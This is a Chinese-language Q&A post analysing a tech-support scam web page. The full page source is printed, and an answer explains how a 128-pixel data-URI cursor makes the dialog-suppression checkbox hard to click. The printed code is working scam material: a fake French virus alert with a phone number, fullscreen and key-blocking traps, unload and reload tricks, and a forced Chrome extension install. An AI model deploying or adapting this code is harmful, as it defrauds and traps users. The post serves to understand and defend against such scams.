技术支持诈骗者始终试图找到使窗口难以关闭以达到诈骗目的的方法.
在这种情况下,该代码部分的目的是使用户难以检查:“防止此页面创建其他对话框”,否则,受害者只能关闭该窗口.鼠标光标乱七八糟,使受害者很难将复选框悬停.我不明白这是如何工作的:
我为*删除了该页面中的一个大斑点,但可以在此处找到完整版本:https://pastebin.com/E57AQjGj
对于将来的访客,这是带有灰色背景(通常清晰)的光标(根据Tschallacka的回答):
这是截至2018年5月的典型Microsoft技术支持骗局的代码:
<html xmlns="http:/www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title> Information </title>
<link href="index_files/bootstrap.css" rel="stylesheet">
<link href="index_files/style.css" rel="stylesheet">
<link href="index_files/translator.css" id="SL_Style" type="text/css" rel="stylesheet">
<link href="index_files/alert.css" rel="stylesheet">
<link href="https://chrome.google.com/webstore/detail/ghbmnnjooekpmoecnnnilnnbdlolhkhi" rel="chrome-webstore-item">
<style>
html {
overflow: hidden;
}
</style>
<script>
/*
window.alert = function(al) {
return function(msg) {
al(msg);
var event = new CustomEvent('alert_clicked');
document.dispatchEvent(event);
};
}(window.alert);
document.addEventListener('alert_clicked', function() {
setTimeout(function() {
toggleFullScreen();
}, 1000)
}, false);
*/
</script>
<script>
function getURLParameter(name) {
return decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [,null])[1] || '');
}
var error = getURLParameter('error');
</script>
<audio id="play" loop><source src="fr.mp3" type="audio/mpeg"></audio>
<!--<audio autoplay="autoplay" loop="">
<source src="index_files/gb.mp3" type="audio/mpeg">
</audio>-->
<script type="text/javascript">
var stroka = "<tr><td valign='top'><table width='100%' height='61' cellpadding='0' cellspacing='0' border='0'><tr><td width='766'><img src='data:image/jpeg;base64,/Z'></td></tr></table></td></tr>";
</script>
<script type="text/javascript">
function toggleFullScreen() {
if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
if (document.documentElement.requestFullscreen) {
document.documentElement.requestFullscreen();
} else if (document.documentElement.mozRequestFullScreen) {
document.documentElement.mozRequestFullScreen();
} else if (document.documentElement.webkitRequestFullscreen)
{document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
}
}
}
</script>
<script type="text/javascript">
document.addEventListener('keyup', function(es) {
if (es.keyCode === 27) {
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
document.addEventListener('keyup', function(e) {
if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
document.getElementById('map').innerHTML = stroka;
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
window.onload = function () {
document.onclick = function (e) {
e = e || event;
target = e.target || e.srcElement;
if (target.tagName === "DIV") {
toggleFullScreen();
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
} else {
toggleFullScreen();
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
}
}
}
</script>
<script type="text/javascript">
addEventListener("click", function() {
document.getElementById('map').innerHTML = stroka;
document.getElementById("play").play();
if (!isFullScreen) {
var el = document.documentElement,
rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
rfs.call(el);
}
});
</script>
</head>
<body onkeydown="return hCPNapvlhFicLoDm(event)" oncontextmenu="return false" style="cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;">
<!-- <canvas id="canvasElement"></canvas> -->
<audio autoplay="autoplay" loop="">
<source src="fr.mp3" type="audio/mpeg">
</audio>
<div id="coFrameDiv" style="height:0px;display:none;">
<iframe id="coToolbarFrame" src="index_files/a.htm" style="height:0px;width:100%;display:none;"></iframe>
</div>
<a id="elem" href="#" style="display: none;"></a>
<span id="audioarea"></span>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td valign="top" align="center"><div id="map"></div>
</td>
</tr>
</tbody>
</table>
<nav class="navbar navbar-default navbar-static-tops">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">
<img src="index_files/windows.png" alt="Windows">
</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Téléchargement </a></li>
<li><a href="#">Devices</a></li>
<li><a href="#">Software</a></li>
<li><a href="#">Apps</a></li>
<li><a href="#">Games</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Software & services</a></li>
<li><a href="#">Devices & Xbox</a></li>
<li><a href="#">For business</a></li>
</ul>
</li>
<li><a href="#">Support</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="#"><strong>Support technique : 09 70 38 74 17</strong></a></li>
</ul>
</div><!--/.nav-collapse-->
</div>
</nav>
<div class="container">
<div class="jumbotron">
<div class="row">
<div class="col-xs-6 text-left">
<h2>Attention</h2>
Ne pas éteindre ou réinitialiser votre ordinateur.
</br></br>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</div>
</div>
</div>
</div>
<footer class="footer">
<div class="container">
<div class="row">
<div class="col-md-4" style="text-align:left;">
<h4>Support</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Security</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Safety & Security Center</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Popular topics</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Locate Windows addresses worldwide</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
Windows 8, or WIndows 7?</a></li>
</ul>
</div>
</div>
<div class="row" style="font-size: 1.2rem; padding:30px 0px;">
<div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span>
</div>
<div style="float:right;">
<span style="padding:0px 15px;">Terms of use</span>
<span style="padding:0px 15px;">English(United States)</span>
<span style="padding:0px 15px;">Trademarks</span>
<span style="padding:0px 15px;">@2016 Windows</span>
</div>
</div>
</div>
</footer>
<div id="chrome-alerts" class="chrome-alert">
<div>
<a href="javascript:openlink()" class="cross">×</a>
<h1>Attention</h1>
<div class="content-box" id="alert-content-box">
<p>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</p>
</div>
<label style="font-size: 12px;"><input type="checkbox"> Empêcher les boîtes de dialogue supplémentaires</label>
<div class="action_buttons">
<a class="active" id="leave_page">OK</a>
</div>
</div>
</div>
<script>
var subid = '';
var clickid = '';
var postback = 'wHBAN004C9IFC3951PRAFUP0';
var cl = false;
var isFullScreen = !(!document.fullscreenElement && !document.msFullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement);
window.onload = function () {
var langs = {
en: {
img: 'ru_new.png',
h3: 'System notification!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
ru: {
img: 'ru_new.png',
h3: '????????? ???????????!',
p: '???????????? ???????? ? ????????? ??????? ?????????? ??? ?????? ????????. ??????? "??" ? ?????????? ???????????? ??????????.'
},
de: {
img: 'ru_new.png',
h3: 'Systembenachrichtigung!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
fr: {
img: 'ru_new.png',
h3: 'Avis de système !',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
es: {
img: 'ru_new.png',
h3: '¡Notificación del sistema!',
p: 'Se está realizando la descarga e instalación de una extensión importante para su navegador. Haga clic en "Aceptar" e instale la extensión propuesta.'
},
pt: {
img: 'ru_new.png',
h3: 'Mensagem de sistema!',
p: 'Importantes adições para o seu navegador estão sendo transferidas ea instalação está em andamento. Pressione OK e instale as extensões!'
},
};
if (window.chrome !== undefined && window.chrome.webstore && window.chrome.webstore.install) {
if (document.cookie.indexOf('tmp_name=') == -1) {
setCookie('tmp_name', 'landing', 24);
}
var lang = langs[navigator.language];
hTRnKeAy1lgYB4La();
if (lang) {
document.querySelector('header img').src = lang.img;
document.querySelector('.gR3SfJr5l9O4jbWa h3').innerText = lang.h3;
document.querySelector('.gR3SfJr5l9O4jbWa p').innerText = lang.p;
}
if (document.cookie.indexOf('c_open' + '=') === -1) {
setCookie('c_open', 'landing', 1);
window.location.href = window.location.href;
}
try {
document.querySelector('footer').style.display = 'none';
document.querySelector('header').style.display = 'block';
} catch (e) {}
} else {
window.onbeforeunload = null;
location.assign('#');
}
};
window.onresize = function () {
if (document.querySelector('header')) {
if (window.innerHeight != screen.height) {
document.querySelector('header').style.display = 'block';
document.querySelector('footer').style.display = 'none';
}
else {
document.querySelector('header').style.display = 'none';
document.querySelector('footer').style.display = 'block';
}
}
};
window.onbeforeunload = function (ev) {
return "You have to install extension !";
};
function kzogExQSrDChY4Iq() {
eKxJS2GzrfWPEjgm();
setTimeout(function () {
document.body.webkitRequestFullscreen();
}, 1000);
}
function setCookie(a, b, c) {
var d = '';
if (c) {
var e = new Date();
e.setTime(e.getTime() + (c * 60 * 60 * 1000));
d = '; expires=' + e.toUTCString()
}
console.log(d);
document.cookie = a + "=" + b + d + ";path=/";
}
function hTRnKeAy1lgYB4La() {
if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
window.onbeforeunload = null;
location.assign('#');
}
}
function gpAkSJDl9ENT5gLQ() {
try {
document.querySelector('footer').style.display = 'block';
document.querySelector('header').style.display = 'none';
} catch (e) {}
}
function eKxJS2GzrfWPEjgm() {
gpAkSJDl9ENT5gLQ();
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
cl = true;
chrome.webstore.install('', function () {
window.onbeforeunload = null;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.onload = function () {
if (clickid) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#', true);
xhrPostback.onload = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
xhrPostback.onerror = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
xhrPostback.send();
} else if (subid) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + subid, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else if (postback) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + postback, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else {
open('#', '_self');
}
};
xhr.onerror = function () {
open('#', '_self');
};
xhr.send();
}, function (error) {
cl = false;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
console.log(error);
document.querySelector('footer').style.display = 'none';
try {
document.querySelector('header').style.display = 'block';
} catch (v) {
}
setTimeout(function () {
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
}, 100);
});
}
function hCPNapvlhFicLoDm(e) {
if (e.which === 123 || e.which === 17) {
return false;
}
}
function hxvw7JrbMUZBqVhN() {
var c = confirm("You should install the chrome extension!");
if (!c) {
hxvw7JrbMUZBqVhN();
}
}
// document.body.addEventListener('keyup', f5WOxk2dF74GMRLf);
document.body.addEventListener('keyup', kzogExQSrDChY4Iq);
document.body.addEventListener('click', kzogExQSrDChY4Iq);
function f5WOxk2dF74GMRLf() {
return false;
}
function dsfsf(e) {
e = e ? e : window.event;
var from = e.relatedTarget || e.toElement;
if (!from || from.nodeName === "HTML") {
// hxvw7JrbMUZBqVhN()
window.location.href = window.location.href;
}
}
function addEvent(obj, evt, fn) {
if (obj.addEventListener) {
obj.addEventListener(evt, fn, false);
} else if (obj.attachEvent) {
obj.attachEvent("on" + evt, fn);
}
}
function removeEvent(obj, evt, fn) {
if (obj.removeEventListener) {
obj.removeEventListener(evt, fn, false);
} else if (obj.detachEvent) {
obj.detachEvent("on" + evt, fn);
}
}
//addEvent(document, "mouseout", dsfsf);
window.onblur = function() {
if (!isFullScreen && !cl) {
window.location.href = window.location.href;
}
};
</script>
<script type="text/javascript">
var nomer = getURLParameter("n");
var red = getURLParameter("red");
if (red === "y") {
document.location.href=("https://" + document.location.host + document.location.pathname + "?n=" + nomer + "&error=" + error);
}
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3638954,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?3638954&101" alt="free hit counter code" border="0"></a></noscript>
</body>
</html>
解决方法:
他们通过将光标替换为128x128px的图像来实现.
请参阅下面的代码片段,并将鼠标悬停在按钮上.
这样,在您认为单击的地方,您不会单击.您看不到要单击的位置,并且始终会错过小复选框.
button {
cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;
}
<button>
test
</button>